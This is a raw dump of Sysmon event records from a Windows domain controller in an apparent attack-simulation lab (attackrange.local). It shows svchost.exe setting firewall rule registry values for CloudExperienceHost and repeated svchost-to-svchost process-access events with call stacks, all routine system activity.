13:29:57.951{08A6967A-4288-6000-1600-000000009A01}1564C:\Windows\system32\svchost.exeHKLM\System\CurrentControlSet\Services\SharedAccess\Parameters\FirewallPolicy\RestrictedServices\Configurable\System\{DC8A8BE3-2970-4C12-88B1-C74D47D3F50B}v2.26|Action=Allow|Active=TRUE|Dir=In|Profile=Private|Profile=Public|RA42=RmtIntrAnet|RA62=RmtIntrAnet|Name=@{Microsoft.Windows.CloudExperienceHost_10.0.14393.1066_neutral_neutral_cw5n1h2txyewy?ms-resource://Microsoft.Windows.CloudExperienceHost/resources/appDescription}|Desc=@{Microsoft.Windows.CloudExperienceHost_10.0.14393.1066_neutral_neutral_cw5n1h2txyewy?ms-resource://Microsoft.Windows.CloudExperienceHost/resources/appDescription}|LUAuth=O:LSD:(A;;CC;;;S-1-15-3-3)(A;;CC;;;WD)(A;;CC;;;AN)|LUOwn=S-1-5-21-2738482597-1131698221-3520544381-500|AppPkgId=S-1-15-2-2434737943-167758768-3180539153-984336765-1107280622-3591121930-2677285773|EmbedCtxt=@{Microsoft.Windows.CloudExperienceHost_10.0.14393.1066_neutral_neutral_cw5n1h2txyewy?ms-resource://Microsoft.Windows.CloudExperienceHost/resources/appDescription}|Security=Authenticate| 13241300x800000000000000010157Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-SetValue2021-01-14 13:29:57.951{08A6967A-4288-6000-1600-000000009A01}1564C:\Windows\system32\svchost.exeHKLM\System\CurrentControlSet\Services\SharedAccess\Parameters\FirewallPolicy\RestrictedServices\Configurable\System\{34AD3DD7-37E7-419F-944A-C6F32B303D86}v2.26|Action=Allow|Active=TRUE|Dir=Out|Profile=Domain|Profile=Private|Profile=Public|RA42=IntrAnet|RA62=IntrAnet|Name=@{Microsoft.Windows.CloudExperienceHost_10.0.14393.1066_neutral_neutral_cw5n1h2txyewy?ms-resource://Microsoft.Windows.CloudExperienceHost/resources/appDescription}|Desc=@{Microsoft.Windows.CloudExperienceHost_10.0.14393.1066_neutral_neutral_cw5n1h2txyewy?ms-resource://Microsoft.Windows.CloudExperienceHost/resources/appDescription}|LUAuth=O:LSD:(A;;CC;;;S-1-15-3-3)(A;;CC;;;WD)(A;;CC;;;AN)|LUOwn=S-1-5-21-2738482597-1131698221-3520544381-500|AppPkgId=S-1-15-2-2434737943-167758768-3180539153-984336765-1107280622-3591121930-2677285773|EmbedCtxt=@{Microsoft.Windows.CloudExperienceHost_10.0.14393.1066_neutral_neutral_cw5n1h2txyewy?ms-resource://Microsoft.Windows.CloudExperienceHost/resources/appDescription}| 10341000x800000000000000010156Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:29:57.951{08A6967A-4287-6000-0C00-000000009A01}588704C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2F00-000000009A01}2252C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000010155Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:29:57.951{08A6967A-4287-6000-0C00-000000009A01}588704C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2F00-000000009A01}2252C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 13241300x800000000000000010154Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-SetValue2021-01-14 13:29:57.951{08A6967A-4288-6000-1600-000000009A01}1564C:\Windows\system32\svchost.exeHKLM\System\CurrentControlSet\Services\SharedAccess\Parameters\FirewallPolicy\RestrictedServices\Configurable\System\{FD69AB32-9CF6-426D-99CC-AF5A298A7B3D}v2.26|Action=Allow|Active=TRUE|Dir=In|Profile=Domain|Profile=Private|Profile=Public|RA42=IntrAnet|RA62=IntrAnet|Name=@{Microsoft.Windows.CloudExperienceHost_10.0.14393.1066_neutral_neutral_cw5n1h2txyewy?ms-resource://Microsoft.Windows.CloudExperienceHost/resources/appDescription}|Desc=@{Microsoft.Windows.CloudExperienceHost_10.0.14393.1066_neutral_neutral_cw5n1h2txyewy?ms-resource://Microsoft.Windows.CloudExperienceHost/resources/appDescription}|LUAuth=O:LSD:(A;;CC;;;S-1-15-3-3)(A;;CC;;;WD)(A;;CC;;;AN)|LUOwn=S-1-5-21-2738482597-1131698221-3520544381-500|AppPkgId=S-1-15-2-2434737943-167758768-3180539153-984336765-1107280622-3591121930-2677285773|EmbedCtxt=@{Microsoft.Windows.CloudExperienceHost_10.0.14393.1066_neutral_neutral_cw5n1h2txyewy?ms-resource://Microsoft.Windows.CloudExperienceHost/resources/appDescription}| 10341000x800000000000000010153Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:29:57.951{08A6967A-4287-6000-0C00-000000009A01}588704C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2F00-000000009A01}2252C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000010152Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:29:57.951{08A6967A-4287-6000-0C00-000000009A01}588704C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2F00-000000009A01}2252C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 13241300x800000000000000010151Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-SetValue2021-01-14 13:29:57.951{08A6967A-4288-6000-1600-000000009A01}1564C:\Windows\system32\svchost.exeHKLM\System\CurrentControlSet\Services\SharedAccess\Parameters\FirewallPolicy\RestrictedServices\Configurable\System\{3E626735-95D7-4CC5-A91D-B5A3EFA392E6}v2.26|Action=Block|Active=TRUE|Dir=Out|Name=@{Microsoft.Windows.CloudExperienceHost_10.0.14393.1066_neutral_neutral_cw5n1h2txyewy?ms-resource://Microsoft.Windows.CloudExperienceHost/resources/appDescription}|Desc=@{Microsoft.Windows.CloudExperienceHost_10.0.14393.1066_neutral_neutral_cw5n1h2txyewy?ms-resource://Microsoft.Windows.CloudExperienceHost/resources/appDescription}|LUOwn=S-1-5-21-2738482597-1131698221-3520544381-500|AppPkgId=S-1-15-2-2434737943-167758768-3180539153-984336765-1107280622-3591121930-2677285773|EmbedCtxt=@{Microsoft.Windows.CloudExperienceHost_10.0.14393.1066_neutral_neutral_cw5n1h2txyewy?ms-resource://Microsoft.Windows.CloudExperienceHost/resources/appDescription}| 10341000x800000000000000010150Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:29:57.951{08A6967A-4287-6000-0C00-000000009A01}588704C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2F00-000000009A01}2252C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000010149Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:29:57.951{08A6967A-4287-6000-0C00-000000009A01}588704C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2F00-000000009A01}2252C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 13241300x800000000000000010148Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-SetValue2021-01-14 13:29:57.951{08A6967A-4288-6000-1600-000000009A01}1564C:\Windows\system32\svchost.exeHKLM\System\CurrentControlSet\Services\SharedAccess\Parameters\FirewallPolicy\RestrictedServices\Configurable\System\{095BA436-1B4C-440B-B69D-EFB771CC738F}v2.26|Action=Block|Active=TRUE|Dir=In|Name=@{Microsoft.Windows.CloudExperienceHost_10.0.14393.1066_neutral_neutral_cw5n1h2txyewy?ms-resource://Microsoft.Windows.CloudExperienceHost/resources/appDescription}|Desc=@{Microsoft.Windows.CloudExperienceHost_10.0.14393.1066_neutral_neutral_cw5n1h2txyewy?ms-resource://Microsoft.Windows.CloudExperienceHost/resources/appDescription}|LUOwn=S-1-5-21-2738482597-1131698221-3520544381-500|AppPkgId=S-1-15-2-2434737943-167758768-3180539153-984336765-1107280622-3591121930-2677285773|EmbedCtxt=@{Microsoft.Windows.CloudExperienceHost_10.0.14393.1066_neutral_neutral_cw5n1h2txyewy?ms-resource://Microsoft.Windows.CloudExperienceHost/resources/appDescription}| 10341000x800000000000000010147Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:29:57.951{08A6967A-4287-6000-0C00-000000009A01}588704C:\Windows\system32\svchost.exe{08A6967A-4754-6000-1A05-000000009A01}2884C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eacf|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8b22|c:\windows\system32\lsm.dll+8a76|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000010146Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:29:57.951{08A6967A-4287-6000-0C00-000000009A01}588704C:\Windows\system32\svchost.exe{08A6967A-4754-6000-1A05-000000009A01}2884C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eacf|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8a38|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000010145Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:29:57.951{08A6967A-4287-6000-0C00-000000009A01}588704C:\Windows\system32\svchost.exe{08A6967A-4754-6000-1A05-000000009A01}2884C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eacf|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000010144Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:29:57.951{08A6967A-4287-6000-0C00-000000009A01}588704C:\Windows\system32\svchost.exe{08A6967A-4754-6000-1A05-000000009A01}2884C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eacf|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000010143Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:29:57.951{08A6967A-4287-6000-0C00-000000009A01}588704C:\Windows\system32\svchost.exe{08A6967A-4754-6000-1A05-000000009A01}2884C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eacf|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8b22|c:\windows\system32\lsm.dll+8a76|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000010142Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:29:57.951{08A6967A-4287-6000-0C00-000000009A01}588704C:\Windows\system32\svchost.exe{08A6967A-4754-6000-1A05-000000009A01}2884C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eacf|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8a38|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000010141Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:29:57.951{08A6967A-4287-6000-0C00-000000009A01}588704C:\Windows\system32\svchost.exe{08A6967A-4754-6000-1A05-000000009A01}2884C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eacf|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000010140Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:29:57.951{08A6967A-4287-6000-0C00-000000009A01}588704C:\Windows\system32\svchost.exe{08A6967A-4754-6000-1A05-000000009A01}2884C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eacf|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000010139Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:29:57.951{08A6967A-4287-6000-0C00-000000009A01}588704C:\Windows\system32\svchost.exe{08A6967A-4754-6000-1A05-000000009A01}2884C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eacf|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000010138Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:29:57.951{08A6967A-4287-6000-0C00-000000009A01}588704C:\Windows\system32\svchost.exe{08A6967A-4754-6000-1A05-000000009A01}2884C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eacf|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000010137Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:29:57.951{08A6967A-4287-6000-0C00-000000009A01}588704C:\Windows\system32\svchost.exe{08A6967A-4754-6000-1A05-000000009A01}2884C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eacf|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000010136Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:29:57.951{08A6967A-4287-6000-0C00-000000009A01}588704C:\Windows\system32\svchost.exe{08A6967A-4754-6000-1A05-000000009A01}2884C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eacf|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000010135Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:29:57.920{08A6967A-4287-6000-0C00-000000009A01}588704C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2F00-000000009A01}2252C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000010134Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 